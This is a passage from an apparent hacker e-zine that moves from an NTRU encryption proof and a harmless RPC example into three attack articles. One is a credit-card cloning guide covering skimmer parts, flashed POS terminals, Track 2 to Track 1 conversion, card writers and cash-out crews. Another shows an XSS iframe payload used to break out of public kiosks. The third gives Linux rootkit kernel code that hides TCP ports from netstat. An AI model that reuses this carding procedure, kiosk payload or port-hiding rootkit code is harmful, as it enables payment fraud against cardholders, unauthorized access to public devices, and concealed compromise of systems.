631. from a given ciphertext - and in fact, it doesn't do so in every case:
632.  
633. Proposition 2.5. With a parameter choice satisfying
634.  
635. 8dp + 4p + 2 < q, (#)
636.  
637. the NTRU-Cryptosystem works correctly.
638.  
639. Proof. Assume that c is a ciphertext generated by the NTRU-ENCRYPTION. Then,
640. by Lemma 2.3,
641.  
642. (T*f)·c = (T*f)·m + (T*f)·(T*h)·r = (T*f)·m + (T*((T*f)·h))·r
643.  
644. modulo q. Since h = (T*f)^(-1)·g, this gives us
645.  
646. (T*f)·c mod q = (T*f)·m + (T*g)·r mod q.
647.  
648. If the absolute values of all entries of the vector v := (T*f)·m + (T*g)·r are
649. bounded by q/2, the loop in steps 2 to 4 of the NTRU-DECRYPTION algorithm will
650. recover the value of v in Z^n and NOT just modulo q. By 2.4, this would then
651. mean
652.  
653. v mod p = (T*f)·m + (T*g)·r mod p = I·m = m.
654.  
655. Hence, let us inspect the vector v more closely. Its i-th entry is given by the
656. formula
657. __ n
658. v[i] = > ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] )
659. ¯¯ j=1
660.  
661. __ n
662. = > ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] )
663. ¯¯ j=1
664.  
665. __ n
666. = > ( f[i-j+1]·m[j] + g[i-j+1]·r[j] )
667. ¯¯ j=1
668.  
669. We write f' := f - e(1), which is the vector chosen in step 1 of the
670. NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is
671. maximized for
672.  
673. f'[i-j+1] = -p if m[j] = -1 and g[i-j+1] = -p if r[j] = -1
674. p if m[j] = 1 p if r[j] = 1
675.  
676. Since f=f'+e(1), we get
677.  
678. |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1,
679.  
680. yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d.
681.  
682.  
683. -- 3 Further Reading -----------------------------------------------------------
684.  
685. If you would like to read the fullblown math article, it is reference [JHLW11]
686. and the URL to the PDF is given below.
687.  
688.  
689. ---- 3.1 References ------------------------------------------------------------
690.  
691. [LLL82] A.K. Lenstra, H.W. Lenstra, and L. Lovasz, Factoring polynomials with
692. rational coefficients, Math. Ann. 261 (1982), 515-534.
693.  
694. [Kan83] Ravi Kannan, improved algorithms for integer programming and related
695. lattice problems, In Proc. 15th ACM Symp. on Theory of Computing (STOC)(1983),
696. 193-206.
697.  
698. [Ajt98] M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized
699. reduc-tions, Proc. of 30th STOC. ACM (1998), 10-19.
700.  
701. [GN08] N.Gama and P.Q.Nguyen, Predicting lattic reduction, Advances in
702. Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer
703. 2008
704.  
705. [MR09] D.J. Bernstein, J. Buchmann and E. Dahmen, Post Quantum Cryptography,
706. chapter Lattice-based Cryptography by Daniele Micciancio and Oded Regev,
707. 147-191, Springer 2009.
708.  
709. [JHLW11] Jesko Huettenhain, Lars A. Wallenborn, Lattice-Based Methods, Seminar
710. Topics in Post-Quantum Cryptography (2011),
711. http://www.uni-bonn.de/~rattle/works/lattices.pdf
712.  
713.  
714. -----------------------------------------------------------------------[ eof ]--
715.  
716.  
717. [==================================================================================================]
718.  
719.  
720. -=[ 0x04 duper's Code Corner
721. -=[ Author: duper
722.  
723. -=[ Website: http://projects.ext.haxnet.org/~super/
724.  
725.  
726. o o o
727. | | |
728. o-O o o o-o o-o o-o o-o o-o o-o o-O o-o o-o o-o o-o o-o o-o o-o
729. | | | | | | |-' | \ | | | | | |-' | | | | | | |-' |
730. o-o o--o O-o o-o o o-o o-o o-o o-o o-o o-o o-o o o o o-o o
731. |
732. o
733.  
734.  
735. /**
736. * Code for creating the client and server sides of a Transport
737. * Independent Remote Procedure Call "Hello World" in Linux
738. *
739. * i.e. not based on the SunRPC code of glibc
740. *
741. * Super-user access is not required, only a running portmapper.
742. */
743.  
744. #include<stdio.h>
745. #include<stdlib.h>
746. #include<string.h>
747. #include<rpc/rpc.h>
748.  
749. /**
750. * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
751. */
752.  
753. void vexit(const char *funcname)
754. {
755. perror(funcname);
756. exit(EXIT_FAILURE);
757. }
758.  
759. void dispatch(struct svc_req *request, SVCXPRT *xprt)
760. {
761. FILE *afile = fopen("/tmp/a.txt", "a");
762.  
763. if(!afile)
764. vexit("fopen");
765.  
766. fputs("Hello World!\n", afile);
767. fclose(afile);
768.  
769. return;
770. }
771.  
772. int main(void)
773. {
774. SVCXPRT* svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0);
775.  
776. if(!svcxprt)
777. vexit("svctcp_create");
778.  
779. printf("xp_sock: %d\n", svcxprt->xp_sock);
780. printf("xp_port: %d\n", svcxprt->xp_port);
781.  
782. if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1)
783. vexit("svc_register");
784.  
785. svc_run();
786. exit(EXIT_SUCCESS);
787. }
788.  
789. #include<stdio.h>
790. #include<stdlib.h>
791. #include<string.h>
792. #include<rpc/rpc.h>
793.  
794. /**
795. * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
796. */
797.  
798. void clnt_vexit(enum clnt_stat value)
799. {
800. clnt_perrno(value);
801. exit(EXIT_FAILURE);
802. }
803.  
804. void vexit(const char *funcname)
805. {
806. perror(funcname);
807. exit(EXIT_FAILURE);
808. }
809.  
810. int main(void)
811. {
812. char *in = "", *out = "";
813.  
814. enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1, xdr_int, in, xdr_int, out, "tcp");
815.  
816. if(s != RPC_SUCCESS)
817. clnt_vexit(s);
818.  
819. exit(EXIT_SUCCESS);
820. }
821.  
822.  
823. [==================================================================================================]
824.  
825. -=[ 0x05 The Tech Behind Credit Card Fraud
826. -=[ Author: K141
827.  
828.  
829. [[ Introduction ]]
830. ---------------
831. Plastics carding is by far the most profitable type of credit card fraud - the replication, or
832. spoofing, of magnetic stripe data to a secondary suitable medium host (magstripe card) being the
833. most common form. I have written this paper to address the followed criminal procedures while
834. explaining these steps as basically as possible. There are numerous papers and articles released
835. that do not even touch the issues at hand; how these criminals obtain this information and more
836. generally, who does what in the spectrum of physical carding.
837.  
838. While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding
839. done, it still stands as a major contender. Technologies exist which could eradicate this type of
840. attack; however, we see no intention of this from the banks as it involves critical changes in the
841. current infrastructure. To date, I see no tech-related reason why this form of fraud is still
842. allowed to be committed.
843.  
844.  
845. [[ Track Data ]]
846. ------------
847. Within a credit card (high-coercive magnetic stripe card), there exists 3 tracks of data (3 sections
848. that are capable of storing data separately). This paper will cover the logical side of magstripe
849. encoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track,
850. polarities and coercivity. After reading, you should be more familiar with the processes involved in
851. how criminals obtain and handle this data to produce profits.
852.  
853. The majority of the time, Track 1 data is not needed for cashing out with plastics. This is the
854. information that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist some
855. terminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will always
856. fill their Track 1 field. Luckily for the attacker, Track 1s can be generated entirely based on
857. Track 2 data. It is important to mention that Track 1 is derived from the information on Track 2 and
858. is often used as a fail-safe if Track 2 is or can not be read. This is also the only track that
859. accepts alphanumeric characters.
860.  
861. Track 2 data is the most important for 'cashing out'. This is where the relevant information for
862. generating Track 1 data is held, as well as other data that allows a transaction to occur.
863.  
864. Track 3 data, mostly, is null.
865.  
866. Before a transaction may occur, a PIN is necessary for authentication. With that said, generally
867. speaking, Track 2 data + PIN = the ability to cash out with that card.
868.  
869.  
870. [[ Obtaining Track Data ]]
871. -----------------------
872. On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". These
873. sellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimum
874. amount' in order to successfully defraud at least $300 or so to make the scam worth their while. If
875. a seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knows
876. the balance of the said account and knows this to be low. There do exist some legitimate sellers;
877. however, the data they sell is typically Track 2 only and can only be cashed out by the minority of
878. the carding community.
879.  
880. That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2
881. data with PINs by either building or buying their own card skimmer.
882.  
883.  
884. [[ ATM Skimming ]]
885. --------------
886. A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track data
887. before the card is legitimately read by the machine. As the victim's credit card is entered into the
888. ATM, it passes through the false fascia (the skimming device) and the Track 2 section passes over
889. the Track 2 read head, stealing the information. As it only passes over the read head, this card is
890. still able to enter the ATM machine and offer the same functionality as an un-tampered ATM.
891.  
892. If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse it
893. into a file on its storage medium, and also timestamp this data for later reference to the
894. timestamped video footage of pin entry. These skimmers must then be collected from the ATM after the
895. attack is complete (usually during early hours in the morning to avoid detection, or when the
896. battery has run low).
897.  
898. If the skimming device is coupled with a pin-pad overlay, it will transmit Track 2 data and PIN via
899. SMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught and
900. concurrently allowing remote operation. These skimmers will only need to be re-visited when the
901. battery runs low.
902.  
903. An ATM skimming device is comprised of a few components:
904.  
905. - Fascia: To overlay the ATM mouth without suspicion.
906. - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note,
907. ideally a skimmer will read only one track of information, as to keep the size of the device
908. minimal.
909. - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed
910. memory locations, usually a Micro-SD card or to the Bluetooth module.
911. - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting
912. Track 2 data, along with PINs back to the carder.
913. - Battery: To power the device.
914.  
915. The components required to build these devices are inexpensive, but the main obstacle towards the
916. building of a skimmer is technical know-how. I have found the price of pre-built skimmers currently
917. to range from $600-$8000, as opposed to $100-700 in building costs.
918.  
919.  
920. [[ POS Skimming ]]
921. --------------
922. Point of sale skimming is a software-based attack in which the firmware of the POS terminal is
923. flashed, rather than a physical device inserted. Common models are the VeriFone Vx510 and various
924. other Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target will
925. believe he/she is making a purchase with their card, and a transaction will appear to process along
926. with a receipt print, but no charge will actually occur. Instead, the card has just been swiped and
927. the target has entered their PIN. A flashed firmware can be programmed to output a later receipt
928. with all three track details, as well as PIN, or designed to save to file for later use. These
929. skimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forcibly
930. issued to comply or offered a percentage of all money made.
931.  
932. An attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumps
933. are encrypted, with the seller holding the encryption key. This forces the buyer to return to the
934. seller, send the encrypted file, and in return, receive only a percentage of the original skimmed
935. cards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000.
936.  
937.  
938. [[ Obtaining Track Data Through Malware ]]
939. --------------------------------------
940. Although rare, ATM malware is an uprising issue among those in the carding community. After the
941. success of the Diebold Ghost trojan, there have been countless requests and confirmations of
942. development for malware designed on specific platforms, namely the Windows CE environment, a
943. favourite among ATM systems. This malware will effectively log all read card data and PINs, printing
944. them to a file encrypted by the malware for later collection. Alternatively, some variants have even
945. offered to print off all stolen credentials in a 'bank statement' format by using the ATM's printer.
946. Needless to say, the deployment of this malware originates from an insider, usually employed or
947. hired by the criminals to infect the ATM system from an ATM technician role.
948.  
949.  
950. [[ Converting Track Data ]]
951. -----------------------
952. Track 2 Data will often appear in the following format:
953.  
954. 5281169568596016=14101010000045100001
955. ^ ^^ ^ ^--CVV
956. | || |
957. Card number _||_ Service code
958. | |
959. Field separator Expiration date
960.  
961. Where:
962. 5281169568596016 = credit card number
963. 14 = expiry year
964. 10 = expiry month
965. 101 = service code
966. 451 = CVV
967.  
968. To generate Track 1 information from a Track 2 field, one must follow these simple steps:
969.  
970. 1. Add a 'B' before the credit card number.
971. 2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.
972. 3. Add six '0's after the T2 data.
973.  
974. Thus, our outputted Track1 data should read as follows:
975. B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000
976.  
977.  
978. [[ Writing Track Data ]]
979. --------------------
980. Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blank
981. medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high
982. quality printing. Services offered typically cost around $15 per card. If the attacker is running a
983. large operation then he/she may even purchase the printing equipment themself. This is comprised of:
984.  
985. - Hi-Co Magnetic Stripe PVC Cards
986. - PVC Printer (Zebra printers are well known for this purpose)
987. - PVC card embosser (to emboss credentials on the card)
988. - PVC card tipper (to tip the embossing with silver/gold)
989. - Signature Panels (on the reverse of the card, often left out by inexperienced carders)
990. - Holograms (typically stickers or hot-roll stamps)
991.  
992. The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity. This is the magnetic
993. power that allows the writing of data to occur on Hi-Co cards. All credit/bank cards will be Hi-Co
994. and, thus, need the appropriate device to be written to. Any device capable of writing at the
995. coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standard
996. magstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process.
997.  
998. The most common magnetic stripe Hi-Co writer is the MSR-206 and MSR-606. The supplied software
999. packages that come with these writers are extremely easy to operate, and it is only a matter of
1000. copying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and
1001. swiping the blank card through the writer.
1002.  
1003.  
1004. [[ Cashing Track Data ]]
1005. --------------------
1006. After this initial attack is complete, the attacker has two options to produce profit:
1007.  
1008. 1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower
1009. risk of being scammed by those you work with.
1010. 2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being
1011. scammed by those you work with.
1012.  
1013. Existing crews work on a percentage basis, normally offering a high percentage to the card supplier,
1014. and if cash out is successful, will either return that percentage through Western Union or run with
1015. the money. Typically, 'test cards' will be exchanged in order for these crews to prove their
1016. authenticity.
1017.  
1018. Forming a crew usually means a localized operation, susceptible to investigation from local
1019. authorities before any foreign law enforcement bodies are involved. I believe most crews will
1020. operate in this manner, a localised crew, often employed by a gang or mafia to supply card data to
1021. their superiors for resale (such as those sold online) or cashed out by a second team.
1022.  
1023.  
1024. [[ Conclusion ]]
1025. ------------
1026. Through my experiences investigating the darker parts of the Internet, specifically carding and
1027. fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It
1028. is my belief that the operations involved in the obtaining and distribution of this information is
1029. largely mafia-based. I hope the information contained within this paper is enough to deter people
1030. from the 'carding scene' rather than to take an interest in it for personal gain. The people
1031. involved are generally small fish, but around every large forum I have visited there are people with
1032. connections I'd dare not to cross.
1033.  
1034.  
1035. [==================================================================================================]
1036.  
1037. -=[ 0x06 Brief Notes on Retail Kiosk Hacking
1038. -=[ Author: storm
1039.  
1040. -=[ Email: storm@gonullyourself.org
1041. -=[ Website: http://gonullyourself.org/
1042.  
1043.  
1044. If you've ever left your basement and ventured outside to the real world, you've more than likely
1045. come into contact with a kiosk at some point in a store or hotel. Most kiosks provide only a
1046. limited keyboard or run a very stripped down version of Windows, rendering certain actions difficult
1047. or impossible to directly achieve, but that only makes it all the more fun. This is no means an
1048. exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've
1049. compiled through my own personal experiences that may either help you or provide inspiration when
1050. approaching a new device.
1051.  
1052. In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides
1053. Internet access at outrageous prices ($20/hour), although complimentary access to the airport's
1054. website and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayed
1055. about 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would give
1056. me something to do other than eating candy and futilely waiting for the Boingo hotspot page to load.
1057.  
1058. The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball with
1059. two buttons, though the right-click button seems unresponsive. The web browser used by this kiosk
1060. looks very much like a version of Internet Explorer themed with cleaner icons, and the file bar and
1061. taskbar are hidden from view.
1062.  
1063. With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations
1064. like Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The fact
1065. that we can access the airport's website and Weather.com is very curious, especially since the
1066. advertisements load fine (which are hosted on third-party servers), yet putting anything in the URL
1067. bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup,
1068. so a simple search for zip code <iframe src="http://www.google.com"></iframe> injects an IFrame into
1069. the page, displaying our coveted search engine.
1070.  
1071. When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single
1072. web site (think the online catalog at Staples stores) or reduce functionality (until the user forks
1073. up their money), XSS is a good place to start. It is common enough that even if you don't come
1074. prepared with a known XSS in the target website, it's usually a trivial matter to find one on the
1075. spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise
1076. other web browser functionality that may escalate our access, provide opportunity to escalate our
1077. access, or provide further information about the box.
1078.  
1079. At this point, we have achieved free Internet access (within the IFrame), but there are more
1080. interesting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suite
1081. leads us to a swiss army knife of tools to probe the system we're on.
1082.  
1083. Through this, we learn that our user-agent is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
1084. .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)
1085.  
1086. We can browse the filesystem by invoking the "Browse" form field, but unfortunately lack of right-
1087. click doesn't let us easily open files and execute programs. If right-click were enabled, we would
1088. be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program, and
1089. select open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe is
1090. open, we would be able to manipulate the system, probe local files or scan the network, or kill the
1091. kiosk software using `tasklist` and `taskkill`.
1092.  
1093. Unfortunately, the ability to view My Computer also seemed disabled. I did not spend a large amount
1094. of time probing the system or enumerating all of the tools provided by iKat, but I did discover the
1095. existence of a file named trust-root.p7b on the Desktop which looked interesting, along with a
1096. shortcut to the SiteKiosk software.
1097.  
1098. In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of
1099. a Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was running
1100. SiteKiosk, but the interface looked very different than the kiosk I encountered in MSP, and it
1101. provided a range of additional functions such as printing and access to Microsoft Office. The
1102. device seemed to take great care not to give too much access to the user (the software provided its
1103. own, more limited filesystem browser that was meant to open documents from flash drives), but it
1104. wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu
1105. or navigating the help bar in online mode, right-clicking and selecting "View Source". This would
1106. invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and USB
1107. stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the
1108. navigation bar.
1109.  
1110. There are plenty of kiosks around to play with, and many of them possess blatant holes in their
1111. access restriction software. Even if there is nothing inherently interesting on the device, it
1112. might be a good idea to check if it's connected to the network or if it dials home anywhere. Just
1113. in general, it's fun to circumvent the software and snoop about the device, and of course things
1114. like free Internet are always cool too. Some devices I've seen think they are clever, or are just
1115. unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes &
1116. Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in-
1117. store kiosk results in the device locking up and calling for employee assistance. Other devices
1118. disable right-click, removing certain escalation opportunity and the ability to access critical
1119. functionality necessary for an attack.
1120.  
1121. There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking
1122. stories, drop us a message and your submission might just be in the next zine.
1123.  
1124.  
1125. [==================================================================================================]
1126.  
1127. -=[ 0x07 Linux Rootkit Development Update
1128. -=[ Author: duper
1129.  
1130. -=[ Website: http://projects.ext.haxnet.org/~super/
1131.  
1132.  
1133. In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface that
1134. previously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkit
1135. functionality goes, since a new technique is required to hide TCP ports from userland administration
1136. programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for
1137. initially bringing this issue to my attention.
1138.  
1139. As a side note: If you have any questions about the intricacies of the Linux kernel, as we will be
1140. working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or
1141. any of the links provided as references at the bottom.
1142.  
1143. Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of the
1144. proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem
1145. pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in
1146. 2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection
1147. hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't
1148. changed in order to safeguard against rootkits -- that was only an unintended side effect.
1149.  
1150. In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new
1151. interface. A new kernel function is dedicated specifically to the purpose of initializing the
1152. /proc/net/tcp file. Note that I'm using the term "file" loosely in this context, as procfs doesn't
1153. behave like a typical filesystem that utilizes disk-based storage. In userland, when a file
1154. descriptor corresponding to a procfs pathname is read(), the results are actually custom-formatted
1155. kernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appear
1156. as empty files when the stat() system call is executed on them. Although procfs files do have
1157. inodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the range
1158. of use for partitioned disk filesystems. Observe the differences in output between the following two
1159. commands:
1160.  
1161. $ stat /proc/net/tcp
1162. File: `/proc/net/tcp'
1163. Size: 0 Blocks: 0 IO Block: 1024 regular empty file
1164. Device: 3h/3d Inode: 4026531957 Links: 1
1165. Access: (0444/-r--r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
1166. Access: 2011-02-19 12:16:32.853287891 -0500
1167. Modify: 2011-02-19 12:16:32.853287891 -0500
1168. Change: 2011-02-19 12:16:32.853287891 -0500
1169. Birth: -
1170. $ stat /bin/ls
1171. File: `/bin/ls'
1172. Size: 109736 Blocks: 224 IO Block: 4096 regular file
1173. Device: 303h/771d Inode: 7660308 Links: 1
1174. Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
1175. Access: 2010-12-25 23:33:12.000000000 -0500
1176. Modify: 2010-12-24 12:18:47.000000000 -0500
1177. Change: 2010-12-24 12:19:01.000000000 -0500
1178. Birth: -
1179.  
1180. As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite
1181. the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the
1182. /usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call
1183. against the the absolute pathnames given as arguments. In this next typescript, statfs() will be run
1184. due to the "-f" command line option, which is an abbreviated form of the getopt_long() option
1185. "--file-system", as documented in the stat(1) man page and GNU info pages.
1186.  
1187. $ stat -f /boot
1188. File: "/boot"
1189. ID: f6c5e14bf02df87f Namelen: 255 Type: ext2/ext3
1190. Block size: 1024 Fundamental block size: 1024
1191. Blocks: Total: 32175 Free: 11084 Available: 9423
1192. Inodes: Total: 8320 Free: 8266
1193. $ stat -f /proc
1194. File: "/proc"
1195. ID: 0 Namelen: 255 Type: proc
1196. Block size: 4096 Fundamental block size: 4096
1197. Blocks: Total: 0 Free: 0 Available: 0
1198. Inodes: Total: 0 Free: 0
1199.  
1200. Clearly, procfs is special since the majority of its statistical information is zeroed out. The
1201. glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles
1202. memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096.
1203. However, page size is platform independent, so your mileage may vary. Note that sysfs behaves in a
1204. manner identical to procfs according to statfs(). If your kernel is configured to support sysfs,
1205. you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would
1206. probably want to concern themselves the most with is /sys/kernel. Again, depending on your
1207. /usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, various
1208. subdirectories could be available under /sys/kernel. My machine has the debug, security, and mm
1209. (memory manager) directories enabled currently. Now that we've gotten the basics squared away, let's
1210. take a look at a rootkit..
1211.  
1212. struct proc_dir_entry *proc_find_tcp()
1213. {
1214. struct proc_dir_entry *p = proc_net->subdir;
1215.  
1216. while (strcmp(p->name, "tcp"))
1217. p = p->next;
1218. return p;
1219. }
1220.  
1221. This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above
1222. shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the
1223. kernel didn't have any direct access functions defined, it became necessary to loop over the
1224. directory entries manually. The last kernel version to be supported by this particular adore-ng
1225. release appears to be 2.6.16, judging by some conditional preprocessor directives within the source:
1226.  
1227. #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)
1228. MODULE_PARM(root_fs, "s");
1229. MODULE_PARM(proc_fs, "s");
1230. MODULE_PARM(opt_fs, "s");
1231. #else
1232. module_param(root_fs, charp, 0644);
1233. module_param(proc_fs, charp, 0644);
1234. module_param(opt_fs, charp, 0644);
1235. #endif
1236.  
1237. It looks as if prior to 2.6.16 there was less convenient syntax available for those developing
1238. Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel
1239. is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake
1240. of consistency, let's double check the current kernel versions:
1241.  
1242. $ finger @kernel.org
1243. [kernel.org]
1244. The latest linux-next version of the Linux kernel is: next-20110218
1245. The latest snapshot 2.6 version of the Linux kernel is: 2.6.38-rc5-git5
1246. The latest mainline 2.6 version of the Linux kernel is: 2.6.38-rc5
1247. The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1
1248. The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4
1249. The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11
1250. The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9
1251. The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8
1252. The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7
1253. The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29
1254. The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28
1255. The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58
1256. The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57
1257. The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11
1258.  
1259. In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code
1260. above) disappeared. After grepping around through the kernel source code a bit, I realized that the
1261. functionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from.
1262. I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a lot
1263. easier than I thought. I found a tcp_proc_register function that allowed me to re-create
1264. /proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now become
1265. init_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it
1266. with the address of a custom struct (just to clarify, we are right now working inside the kernel):
1267.  
1268. static struct tcp_seq_afinfo tcp4_seq_afinfo = {
1269. .name = "tcp",
1270. .family = AF_INET,
1271. .seq_fops = {.owner = THIS_MODULE},
1272. .seq_ops = {.show = new_tcp4_seq_show}
1273. };
1274.  
1275. To understand what's going on here, one needs to realize that procfs makes itself appear to userland
1276. as any other filesystem would. It exposes various functions for operating on the files and
1277. directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show
1278. function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is
1279. net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The
1280. new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show
1281. function, unless it's determined that the TCP connection currently being processed by a read
1282. operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the
1283. rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string
1284. that describes the connection.
1285.  
1286. static int (*old_tcp4_seq_show)(struct seq_file *seq , void *v) = 0;
1287.  
1288. // Array initialization syntax must be zero-terminated
1289. static const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0};
1290.  
1291. static int new_tcp4_seq_show(struct seq_file *seq, void *v)
1292. {
1293. const signed int retval = old_tcp_seq_show(seq, v);
1294. register unsigned short i = 0;
1295. static unsigned int line = 0;
1296. auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE;
1297.  
1298. if(v == SEQ_START_TOKEN)
1299. return line = 0, retval;
1300.  
1301. for(i = 0;hidden_ports[i];i++)
1302. {
1303. sprintf(hex_port, ":%04X", hidden_ports[i]);
1304.  
1305. if(strstr(offset, hex_port))
1306. return seq->count -= NET_LINE, retval;
1307. }
1308.  
1309. sprintf(offset, "% 4i", line++);
1310.  
1311. return offset[4] = ':', retval;
1312. }
1313.  
1314. The old_tcp_seq_show identifier is simply a function pointer to the original tcp4_seq_show function
1315. that was assigned to the .seq_ops member of the tcp_seq_afinfo structure, whose definition was shown
1316. above. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. The
1317. introduction of our wrapper function to the traditional kernel control flow effectively hides
1318. certain ports from userland by looping over an array that contains the rogue port numbers. In this
1319. way, running a command such as netstat will not display the TCP connections that have been hidden
1320. from /proc/net/tcp.
1321.  
1322. The hidden_ports array is specified with the C language keywords "static" and "const." These prevent
1323. the initialized port numbers from being accessed from outside of the current source file and from
1324. having the values modified after compilation. Also, the hidden_ports array is defined to be of type
1325. "unsigned short" because the source and destination port fields in TCP packet headers are non-
1326. negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation.
1327.  
1328. 0 1 2 3
1329. 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
1330. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
1331. | Source Port | Destination Port |
1332. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
1333.  
1334. Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then pass
